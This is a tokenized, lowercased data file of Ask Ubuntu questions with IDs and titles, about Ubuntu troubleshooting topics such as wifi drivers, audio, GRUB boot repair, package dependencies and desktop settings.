428842	can an intel wireless 7260 work as access point ?	is there any way to make an intel wireless 7260 ( rev 73 ) to work as access point ? i could n't find anything useful around . i 'm on ubuntu 13.10 , and under /lib/firmware there are : iwlwifi-7260-7.ucode iwlwifi-7260-8.ucode i can do all the changes required ( even installing an alpha ubuntu ) , but i have no clues on what can be done .
428849	can not get left earphone working	i 'm running ubuntu 12.04.4lts and my left earphone is not working . it is a brand new pair with nothing wrong with it so i know it 's not an issue with the earphones . i have been googling for a good half hour if not more and trying various things but i have had no luck so far . i ran alsamixer and i verified that `` master volume '' is not muted . i was trying to install the realtek driver as detailed in this thread but i got the same error as detailed in that post linked to . so what 's going on here , there 's no configure file in the stuff i downloaded from realtek ? why ? : / edit : just stating for clarity , doing the sound test in system > sound for the earphones does not give any sound out put when testing the left one , unsurprisingly . edit # 2 : one of the courses of action i took in trying to resolve this was the original solution in this answer , but it did n't fix it . as i mentioned above , running the install file fails with this error . ./install : 19 : ./install : ./configure : not found make : *** no targets specified and no makefile found . stop . make : *** no rule to make target `install ' . stop . ./install : 23 : ./install : ./snddevices : not found so , taking a step back , let 's forget about the possibility of something being broken in the pc for now . now , does anyone know how i can resolve this error ? perhaps is there somewhere i can find the apparently missing makefile ? my earlier google searches did n't give me anything .
428850	open windows maximized !	i want some of the application to be opened in a maximized state . can i have windows open in a maximised state ? does ccsm provide a way to do that ?
428851	file uploader by zoom ubuntu 13.10	when i want to run file uploader under wine , i 've got an error : $ wine fileuploader.exe p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory fixme : keyboard : x11drv_loadkeyboardlayout l '' 00000409 '' , 0080 : stub ! x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 148 ( render ) minor opcode of failed request : 34 ( rendercreatelineargradient ) value in failed request : 0x0 serial number of failed request : 1717 current serial number in output stream : 1794 any idea how to fix it and make it run ?
428853	how to edit xps files ?	xps files are microsoft 's rival to adobe 's pdf format . how to edit or create new xps files in ubuntu ? !
428854	progress bar data display	hi how do i get the progress bar to continue the show in mb and not change to gb when i copy a file i use ubuntu 12.04 ( precise ) 32-bitars gnome 3.4.2
428861	ca n't install ubuntu 12.04 desktop	so i download ubuntu 12.04 32-bit version . i used universal usb installer to create a bootable usb device . after restarting it 's shows these options *run from usb *install on harddisk and many more . so i ca n't run from usb easily but ca n't install it . when i do . the moment when i 've to specify where to install ubuntu . i choose `` alongside window 7 '' clicking on it , changes the continue button to `` restart to continue '' and clicking on it repeats the same process . how to get past it ? by the way , i do n't have wi-fi or internet on pc , so i ca n't really connect to internet while installing .
428862	blackscreen like dos after press f5	this is the first time i use ubuntu . ( actually , i 've used ubuntu 10.10 before , but now i 'm going back to ubuntu because my windows encounters bugs and is n't stable ) my trouble here with my dell 14r n4010 is : when i press f5 ( increase brightness ) several times ( more than 3 ) or hold f5 , my screen is going black and looks like the `` command prompt `` in windows . but i ca n't go back to the usual screen . ca n't use alt+f7 or whatever like it , ca n't do anything when screen goes black , only saw the cursors `` _ '' in screen . only way i know to fix it is hold power buttons and reboot my laptop . so , how can i fix it ? or return normal screen ? thank you .
428865	ubuntu 13.10 crashed - grub rescue is displayed	i was writing a dvd when i shutdown the computer without thinking . and on starting it again i am getting grub rescue > > following solutions in other forums i tried the following - load ubuntu 13.10 from a live dvd and : 1 ) sudo su & & fdisk -l result : fdisk : unable to read /dev/sda : input/output error 2 ) gnome-disks and in 'smart data & self-tests ' > start self-test self-test result : last self-test failed ( read ) 3 ) sudo apt-get update & & sudo sudo apt-get install testdisk - i even checked 'universe ' option in software center as many had suggested . reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened . i have a windows vista dual boot , am not able to access that too . more than that i need ubuntu back ! any help would be appreciated .
428868	how to write a script that will execute xampp start and stop	i am trying to write a script that will enable xampp start and xampp stop with the same script without having to write in the terminal everytime . to start xampp , i write in console : sudo /opt/lampp/lampp start sudo /opt/lampp/lampp stop how to make a script executable which allows xampp to start and stop simultaneously when double clicked ? any idea is always welcomed .
428870	edubuntu in ubuntu	guys i 'm currently using ubuntu lts version 12.04.4 . i would like to install edubuntu with higher secondary that is pre-college ( age 16 ) and college level packages installed . i would like to know how to go installing edubuntu should i download the iso or is there a easy way i install from within ubuntu ? if from within ubuntu how do i do it ? from the software centre or ? please be detailed in your explanation .
428872	arm compiling on ubuntu 12.04	i 'm trying at the moment to compile a sdk with menuconfig for an arm processor , which is built on a raspberry pi . i have already configured the .config file , but i have come across these errors : http : //pastebin.com/ghhhu0uv
428873	errors running make on wifi kernel module	i was trying to solve my wifi connectivity problems using the instructions given here . when i try the following : sudo apt-get install linux-headers-generic build-essential git git clone http : //github.com/lwfinger/rtl8723be cd rtl8723be make i get the following error message : ~/rtl8723be/regd.c : in function ‘_rtl_reg_apply_beaconing_flags’ : ~/rtl8723be/regd.c:200:20 : error： ‘ieee80211_chan_no_ir’ undeclared ( first used in this function ) ~/rtl8723be/regd.c:200:20 : note： every undeclared identifier reported only once in the function ~/rtl8723be/regd.c : in function‘_rtl_reg_apply_active_scan_flags’ : ~/rtl8723be/regd.c:237:19 : error： ‘ieee80211_chan_no_ir’undeclared ( first used in this function ) ~/rtl8723be/regd.c : in function‘_rtl_reg_apply_radar_flags’ : ~/rtl8723be/regd.c:312:8 : error： ‘ieee80211_chan_no_ir’undeclared ( first used in this function ) ~/rtl8723be/regd.c : in function‘_rtl_regd_init_wiphy’ : ~/rtl8723be/regd.c:410:18 : error： ‘regulatory_custom_reg’undeclared ( first used in this function ) ~/rtl8723be/regd.c:411:19 : error： ‘regulatory_strict_reg’undeclared ( first used in this function ) ~/rtl8723be/regd.c:412:19 : error： ‘regulatory_disable_beacon_hints’undeclared ( first used in this function ) make [ 2 ] : *** [ /home/science/wifi/rtl8723be/regd.o ] error 1 make [ 1 ] : *** [ _module_/home/science/wifi/rtl8723be ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-36-generic' make : *** [ all ] error 2 can anyone help me ? thanks .
428874	ubuntu installation problem- packages have unmet dependencies	when i try install any application via terminal this is the message i get- the following packages have unmet dependencies : xchat : i386 : depends : libdbus-1-2 : i386 ( > = 0.60 ) but it is not installable depends : libperl5.8 : i386 ( > = 5.8.7 ) but it is not installable depends : python2.4 : i386 ( > = 2.3.90 ) but it is not installable depends : tcl8.4 : i386 ( > = 8.4.5 ) but it is not going to be installed xchat-gnome : depends : liblaunchpad-integration1 ( > = 0.1.17 ) but it is not going to be installed depends : libsexy2 ( > = 0.1.8 ) but it is not going to be installed depends : tcl8.4 ( > = 8.4.16 ) but it is not going to be installed depends : xchat-gnome-common ( = 1:0.30.0~git20110821.e2a400-0.2ubuntu4.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried following various answers given in this website but none of them seemed to work . any help would really be appreciated .
428875	how can i add images for each user to ubuntu 12.04 logon screen ?	i am not talking about having unique backgrounds on the login screen . what i am looking for is a icon image besides each user name on the logon screen . this was something that was possible in ubuntu 10.04 ( i think it was called `` human '' or something similar ) . i 've searched the forums high and low with no luck . any ideas ?
428878	bad quality and playback issues when playing video with vlc	i encounter problems when playing h.264 ( not tested with others ) encoded videos with vlc or others players ( tested mplayer , totem not playing the video just the sound ) . i 'm sure it 's about driver but i do n't know how to fix it . i tried to install proprietary drivers from amd but after rebooting i ca n't log in ( only terminal ) . my graphics card is an amd radeon hd 8 series . i do n't know if it 's related , i boot with nomodeset option . thanks for your help . edit : here the result of : lspci -nnk 00:00.0 host bridge [ 0600 ] : intel corporation haswell-ult dram controller [ 8086:0a04 ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c:2164 ] 00:02.0 vga compatible controller [ 0300 ] : intel corporation haswell-ult integrated graphics controller [ 8086:0a16 ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c:2164 ] 00:03.0 audio device [ 0403 ] : intel corporation device [ 8086:0a0c ] ( rev 09 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : snd_hda_intel 00:14.0 usb controller [ 0c03 ] : intel corporation lynx point-lp usb xhci hc [ 8086:9c31 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : xhci_hcd 00:16.0 communication controller [ 0780 ] : intel corporation lynx point-lp heci # 0 [ 8086:9c3a ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : mei_me 00:1b.0 audio device [ 0403 ] : intel corporation lynx point-lp hd audio controller [ 8086:9c20 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : snd_hda_intel 00:1c.0 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 1 [ 8086:9c10 ] ( rev e4 ) kernel driver in use : pcieport 00:1c.1 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 2 [ 8086:9c12 ] ( rev e4 ) kernel driver in use : pcieport 00:1c.2 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 3 [ 8086:9c14 ] ( rev e4 ) kernel driver in use : pcieport 00:1c.3 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 4 [ 8086:9c16 ] ( rev e4 ) kernel driver in use : pcieport 00:1c.4 pci bridge [ 0604 ] : intel corporation lynx point-lp pci express root port 5 [ 8086:9c18 ] ( rev e4 ) kernel driver in use : pcieport 00:1d.0 usb controller [ 0c03 ] : intel corporation lynx point-lp usb ehci # 1 [ 8086:9c26 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : ehci-pci 00:1f.0 isa bridge [ 0601 ] : intel corporation lynx point-lp lpc controller [ 8086:9c43 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : lpc_ich 00:1f.2 sata controller [ 0106 ] : intel corporation lynx point-lp sata controller 1 [ ahci mode ] [ 8086:9c03 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : ahci 00:1f.3 smbus [ 0c05 ] : intel corporation lynx point-lp smbus controller [ 8086:9c22 ] ( rev 04 ) subsystem : hewlett-packard company device [ 103c:2164 ] 08:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) subsystem : hewlett-packard company device [ 103c:197d ] kernel driver in use : rtl8188ee 09:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 08 ) subsystem : hewlett-packard company device [ 103c:2164 ] kernel driver in use : r8169 0a:00.0 display controller [ 0380 ] : advanced micro devices , inc. [ amd/ati ] sun xt [ radeon hd 8670a/8670m/8690m ] [ 1002:6660 ] subsystem : hewlett-packard company device [ 103c:2164 ]
428884	remapping menu key to delete on xubuntu	i would like to bind my menu key ( the one that brings up the context menu at your cursor location ) to my delete key for convenience . preferably , i 'd like to do this through xkboptions in /etc/default/keyboard , as that 's where i have rebound my esc key . i could n't get that to work so i tried using xmodmap , but i needed the keycode for the menu key . here is the output i get from xev when i press the delete key , followed by the menu key : keypress event , serial 47 , synthetic no , window 0x2c00001 , root 0x90 , subw 0x0 , time 51367021 , ( -344,241 ) , root : ( 250,535 ) , state 0x10 , keycode 119 ( keysym 0xffff , delete ) , same_screen yes , xlookupstring gives 1 bytes : ( 7f ) `` '' xmblookupstring gives 1 bytes : ( 7f ) `` '' xfilterevent returns : false keyrelease event , serial 47 , synthetic no , window 0x2c00001 , root 0x90 , subw 0x0 , time 51367106 , ( -344,241 ) , root : ( 250,535 ) , state 0x10 , keycode 119 ( keysym 0xffff , delete ) , same_screen yes , xlookupstring gives 1 bytes : ( 7f ) `` '' xfilterevent returns : false focusout event , serial 47 , synthetic no , window 0x2c00001 , mode notifygrab , detail notifyancestor mappingnotify event , serial 47 , synthetic no , window 0x0 , request mappingkeyboard , first_keycode 8 , count 248 mappingnotify event , serial 48 , synthetic no , window 0x0 , request mappingkeyboard , first_keycode 8 , count 248 focusin event , serial 48 , synthetic no , window 0x2c00001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 48 , synthetic no , window 0x0 , keys : 4294967184 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 thanks .
428886	how do i integrate periscope with nautilus ?	how do i fully integrate periscope with nautilus so that i can right-click on a video file and get subtitles downloaded ? i have downloaded all the appropriate files and periscope is fully installed . the problem is getting it fully integrated with nautilus or something like nautilus . i do not want to operate at the the console
428889	how to write a shell script that synchronizes google drive to linux os ?	google drive is probably not the best choice for linux and i think there are other free services compatible with linux . i just wanted to know how painful it would be to write a script that would upload files from my linux computer to google drive on start up and downloads files from google drive to my linux computer to stay synchronized .
428891	destroyed windows 8 with damaged ubuntu on usb	i was trying to get windows 8 and ubuntu get along and dual boot . somewhere along the process of trying to boot from usb ( over and over while testing different uefi settings ) , the usb got damaged without me knowing it . i finally managed to boot from usb and start installing ubuntu . i got through few beginning steps of installation , but then ubuntu detected error on the flash disk and installation stopped . i took the usb to reinstall ubuntu image ( on another machine ) , but i found that windows got damaged in the process . windows tried to recover from error few times . it got stuck in different stages while not doing anything and displaying the same message for half an hour and not spinning the disc , so i turned it off and tried again . after that , windows finally realized it cant fix itself . i turned it off and successfully installed ubuntu from reinstalled usb . now i have working ubuntu and i cant access the damaged windows . grub doesnt show any option of booting windows . while the windows were damaged and would not boot , it still showed option of recovering from recovery disk which i have , but that option can not be accessed anymore . im left with the recovery image of windows and i dont know how to recover from it , since the menu of windows `` zombie stub '' or what should i call it disappeared . any ideas what should i do now to recover windows ? how to get that stub of windows running and recovering ? things ive done so far : got to uefi and started the option of `` windows boot manager '' which still hangs there , but screen just flicks for a split of a second and stops instead of loading windows installed boot-repair which did say that it repaired the booting , but windows dont show up in grub and cant be started sudo update-grub . it said it added new options to grub menu , but i havent found any , windows 8 still not on the list
428893	how to see if there are any qbittorent torrents from shell script ?	i run a script on startup that opens a browser , irc , and qbittorrent . it looks similar to this : chromium-browser & qbittorrent & xchat & guake & is there any way i can detect if there are any `` active '' torrents and only open qbittorrent if yes ? by active i mean any torrent in the client , not necessarily downloading ( they 're not downloading anyway if it 's closed ) .
428899	title bar graphic mangled on nvidia hybrid graphic system	i 'm using ubuntu 13.10 and i 'm currently having problems with the title bar on every window i open it looks really bad , here 's a pic . thanks in advance . the ubuntu version is 13.10 64-bit , the graphic card is intel hd 4400 ( this is a laptop , intel i5 4200-u ) which also have a nvidia 740m .
428900	download/upload still going even though internet is gone	so sometimes my internet is disappearing and it 's probably my internet provider problem , because my neighbors got the same problem . now what 's strange is when internet is gone , i can see using system monitor that network download/upload is still going on , but just several kilobytes . why is it showing internet download/upload when internet is completely gone ?
428906	simulated secondary click does n't work | ubuntu 12.04	i would like to know how i can use simulated secondary click by press for a few seconds click left . because it does n't work now . i have turn on accessibility option in settings- > accessibility menu : simulated secondary click . but on the desktop , does n't work . i would succeed because its important for me to navigate on browser ( firefox/chromium ) with simulated secondary click .
428914	how to switch keyboard layouts in xubuntu ?	in unity one can easily switch between keyboard layouts using the keyboard tray icon . there is also the keyboard menu where one can add/remove/set keyboard layouts . i can not find any of this functionality in xubuntu . how can the keyboard layout be switched in this desktop environment ? thanks . update i : details on the xubuntu-desktop package this question refers to : $ sudo apt-cache show xubuntu-desktop package : xubuntu-desktop priority : optional section : universe/metapackages installed-size : 43 maintainer : xubuntu developers < xubuntu-devel @ lists.ubuntu.com > architecture : amd64 source : xubuntu-meta version : 2.152 depends : [ ... ] size : 3790 md5sum : 26efaa0f16c70a82d216165ba2af4fd4 sha1 : 49c283439314e48d46668e07d65c4a261e9b556a sha256 : 36e51760324e081988a068aa29de4968a7d050c18bad4128967ffd656c570f3f description-en : xubuntu desktop system this package depends on all of the packages in the xubuntu desktop system . it is safe to remove this package if some of the desktop system packages are not desired . description-md5 : 25eeb522d88fba23a532953cbbf1638e bugs : https : //bugs.launchpad.net/ubuntu/+filebug origin : ubuntu task : xubuntu-desktop update ii : the solution proposed for xubuntu 11.10 is not working with this latest version of xfce . the xfce4-xkb-plugin package is apparently installed together with xubuntu-desktop . update iii : this is no longer an issue on xubuntu 14.04 , a nice tray icon in this latest version allows the user to easily switch between keyboard layouts .
428915	need to know if new gpu will work and a few other questions	dear fantastic ubuntu community i have been planning to ditch windows for sometime now and i need to know a few things , firstly the gpu have does not support the latest version of ubuntu so i am in the process of purchasing a new gpu the one i have in mind is the radeon hd7870 as i need to use my six screen setup will this work with ubuntu also on windows i play the sims 3 and many other games will these be supported either under wine or under steam , not vital but would be great . thanks for your great help and support yours sincerely chris russell
428918	vagrant equivalent to ubuntu 12.04.3 lts ( ami-83e2dcea )	aws opsworks is using ami-83e2dcea as the ami for stacks configured with the `` ubuntu 12.04 lts '' as the default operating system . i 'm trying to simulate this environment locally using vagrant , but having trouble finding the 12.04.3 virtual box image . i 've found http : //cloud-images.ubuntu.com/vagrant/precise/ but i 'm not seeing how these builds map to the 12.04.3 lts version . am i looking in the right place ? thanks ! sam
428924	ubuntu desktop - installing gearman , memcached & lamp	i have made many attempts in the past to get ubuntu desktop to work right on my laptop and always run into a hurdle - the most frequent being that the setup kept dropping my wifi connection . so this time round i have decided to get a preconfigured machine from system76 . however , they only do ubuntu desktop . the machine will be useless to me unless it gives me the liberty of doing local live testing with gearman , memcached on a lamp stack . simple question - am i attempting to accomplish the impossible here or can it be done ?
428926	banshee player importing playlists	how can i import multiple play-lists m3u 's all i can do right now is to import them one at a time , i had saved all my pls as i was reloading ubuntu , but now it looks like i would have been just as well making them all up again one at a time its a colossal waste of time . do you know of any way we can import simultaneously multiple m3u play-lists right now it takes 6 clicks to import a m3u pls and move on to the next ; with play lists that run from a-z its going to be a long time adding them all again i 've sort of solved it ; i managed to highlight them all to import , it took a few goes and banshee crashing a few times ; however , the playlists are blank why is that ?
428928	how can i change the kubuntu background from default ?	can someone please tell me how to change the default background in kubuntu 12.04 ? i have managed to select a rather nice wallpaper for my desktop , but i can not change the background for the splash screen , lock screen or login screen . i am using the lightdm-kde-greeter because i think it looks nicer than the default , but as i have said , it just refuses to allow me to change my default , wallpaper ( the grey one - why they chose grey i will never know ) . if i choose `` classic '' lightdm greeter theme it works , and i can change my login screen background but not my splash screen , and if i choose user bar i can not even change background . here is what i have tried so far : system settings , login screen ( lightdm ) . choose my image for the background under classic and apply the changes , then switch to user bar . this did not work . system settings , login screen , disable themed greeter , then choose background image , and re-enable themed greeter . this did n't work either . going in as root to /usr/share/wallpapers , deleting the link called kubuntu-default.png and recreating it pointing to my chosen image . this did not work either . deleting my cache from /var/tmp . again , this did not work . can someone advise me , i 'm starting to go mad here !
428932	installing ubuntu on mid 2012 imac	all the guides that i 've found so far are pretty outdated so wanted to rekindle the topic . i 've read about the differences in bootloaders ( which i 've no idea is still a problem or not ) which can make the process bit difficult . i could n't find any detailed tutorial or videos on this subject which is relatively new . i 'm actually planning to buy a couple of mid 2012 imacs for my business purposes and install ubuntu ( for software development purposes ) . we want to clean install ubuntu on these machines . can anybody please provide me a detailed instruction on how to install ubuntu 13.10 ?
428935	fixing grub.cfg	i had problems for dual boot windows 7 and ubuntu 12.04 lts . i solved my windows problem , but i ca n't boot ubuntu from hard disk . when i run from super grub2 and use the recovered grub cfg file option the boot don’t work , only work when i select the first option : found any os . is there anything wrong in my ubuntu installation grub files for dual boot ( both os ) ? i would like to know your expert opinion before run `` grub-install /dev/hda '' ========= this is and image of my partitions ( i have only 1 hard disk ) tomas @ tomas-hp-compaq-cq5000 : ~ $ sudo fdisk -l [ sudo ] password for tomas : disco /dev/sda : 640.1 gb , 640135028736 bytes 255 cabezas , 63 sectores/pista , 77825 cilindros , 1250263728 sectores en total unidades = sectores de 1 * 512 = 512 bytes tamaño de sector ( lógico / físico ) : 512 bytes / 512 bytes tamaño e/s ( mínimo/óptimo ) : 512 bytes / 512 bytes identificador del disco : 0x7fff8ad0 dispositivo inicio comienzo fin bloques id sistema /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 568414207 284103680 7 hpfs/ntfs/exfat /dev/sda3 568416254 1227589631 329586689 f w95 ext 'd ( lba ) /dev/sda4 1227589632 1250260991 11335680 7 hpfs/ntfs/exfat /dev/sda5 568416256 1164101631 297842688 7 hpfs/ntfs/exfat /dev/sda6 1164103680 1223911423 29903872 83 linux /dev/sda7 1223921664 1227589631 1833984 82 linux swap / solaris ======== and this is the grub.cfg : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 21745c1b-4a7d-4a6b-afd3-3a956f32f007 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 21745c1b-4a7d-4a6b-afd3-3a956f32f007 set locale_dir= ( $ root ) /boot/grub/locale set lang=es_co insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ { linux_gfx_mode } '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , con linux 3.11.0-17-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 21745c1b-4a7d-4a6b-afd3-3a956f32f007 linux /boot/vmlinuz-3.11.0-17-generic root=uuid=21745c1b-4a7d-4a6b-afd3-3a956f32f007 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.11.0-17-generic } menuentry 'ubuntu , with linux 3.11.0-17-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 21745c1b-4a7d-4a6b-afd3-3a956f32f007 echo 'cargando linux 3.11.0-17-generic ... ' linux /boot/vmlinuz-3.11.0-17-generic root=uuid=21745c1b-4a7d-4a6b-afd3-3a956f32f007 ro recovery nomodeset echo 'cargando el disco ram inicial ... ' initrd /boot/initrd.img-3.11.0-17-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 21745c1b-4a7d-4a6b-afd3-3a956f32f007 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos6 ) ' search -- no-floppy -- fs-uuid -- set=root 21745c1b-4a7d-4a6b-afd3-3a956f32f007 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 089c91b49c919d2e chainloader +1 } menuentry `` windows recovery environment ( loader ) ( on /dev/sda4 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos4 ) ' search -- no-floppy -- fs-uuid -- set=root 9074e29174e278fc drivemap -s ( hd0 ) $ { root } chainloader +1 } set timeout_style=menu if [ `` $ { timeout } '' = 0 ] ; then set timeout=10 fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
428938	how do install gnome subtitles ?	how do i install gnome subtitles ? i have this problem . how do i fix it ? ? ? alan @ alan-latitude-d530 : ~ $ sudo apt-get install gnome-subtitles reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : gnome-subtitles : depends : libgstreamer-plugins-base1.0-0 ( > = 1.0.0 ) but it is not installable depends : libgstreamer1.0-0 ( > = 1.0.0 ) but it is not installable e : unable to correct problems , you have held broken packages . alan @ alan-latitude-d530 : ~ $
428940	i can not ping microsoft.com but can open it using browser	i can not ping microsoft.com but can open it through firefox . i am using 12.04lts . i am able to ping all other websites .
428943	google chrome can not determine or set the default browser	i updated the google chrome version , and since opera has become my default browser . in google chrome , under the default browser settings , it just says : '' google chrome can not determine or set the default browser . '' how do i change this ?
428946	when streaming / recording my desktop , how do i also record the audio ?	i 'm running the latest ubuntu on my pc and want to stream my whole desktop to a tv screen connected to a raspberry pi running xbmc . so far i manage to grab the stream wit avconf . dumping it in a file works and so does streaming it to the xbmc over http ( i created .strm files on a source in the xbmc to have easy access to the streams ) . the stream takes a couple of seconds to load and after that i have a delay of about 4 seconds between actions on my screen and the result on the tv . that 's okay for me but can probably be tweaked with better codec or transport settings ( rts maybe ? ) . my problem is though : i ca n't record any audio . neither when dumping to a file nor when streaming to the xbmc . so i guess the problem has to do something with the grabbing command or my audio setup ? i use the following command to grab my screen : avconv \ -f x11grab -s 1920x1080 -r 25 -i :0.0+0.0 \ -f alsa -ac 2 -i pulse \ -vcodec libx264 -preset ultrafast -s 1280x720 \ -acodec libmp3lame \ -threads 0 test.avi and the next one to stream it : avconv ... -f mpegts - | \ vlc -i dummy - -- sout= ' # std { access=http , mux=ts , dst= : $ port } '
428948	how to start a program ?	total newbie , i can download programs , but how do i make the program executable ? using 13.10 thank you john
428951	wifi does n't work on lenovo g500 with ubuntu 13.10	i have been using ubuntu for more than 10 years but this is first time i could not get around an issue with a solution . any help would be great as i have tried everything available that i found on the internet . i have a qca8172 atheros ethernet adapter on a lenovo g500 . it works when a cable is attached but there is no wifi at all . .enter image description here ! i tried to post a image , but it did n't let me add a pic . i tried with backports and with also compact drivers but still have the same issue .
428953	how to fix no sound with skype on linux ?	i am using a webcam c310 analog mono . i can visually see others on skype and i can hear others on skype , but nobody on skype can hear me . any suggestions to find the problem ?
428956	gpu overheating	i 'm quite new to ubuntu , but , sometimes , when i 'm on youtube , or doing something else , gpu overheats , and cooler gets very loud , until i close everything i 'm doing , than after few seconds gpu gets cooler ... i 've be searching on forums for this problem , but i did n't find soultion ... i 'm using dell inspiron 15 3521 : gpu : intel hd 4000 ( i hope ) and ati radeon hd 8730m cpu : intel core i3 3227u 1.9ghz ram : 4gb i 'm not sure what 's overheating , but i think it 's the gpu
428957	how can i reinstall ( re enable ) my touchpad for my hp chromebook 14 ?	touchpad is n't being detected at all on ubuntu 13.10 . i looked on the mouse and touch pad settings and it is n't detected at all . i connected an external mouse and it works , but i like using the touch pad . if there is a way to re install it or something that would be awesome ! thanks
428958	how to get ubuntu standard background settings dialogue back ?	after installing the gnome shell in ubuntu 13.10 the dialogue for changing the desktop wallpaper gets replaced with gnomes 's dialogue , which is feature less , poor and useless thing . to illustrate the difference of both dialogues : this is how it looks like , before you install the gnome packages ( and what i want to get back ) : this is how it looks like after you installed the gnome packages : does anybody know how to get the unity version of the `` change background '' dialogue back ?
428961	why is there no beta 1 release of ubuntu ?	why is there no release of ubuntu 14.04 beta 1 ? there is a release for all of the ubuntu spin-off 's ( xubuntu , lubuntu , etc ) but nothing specific to ubuntu that i 've found .
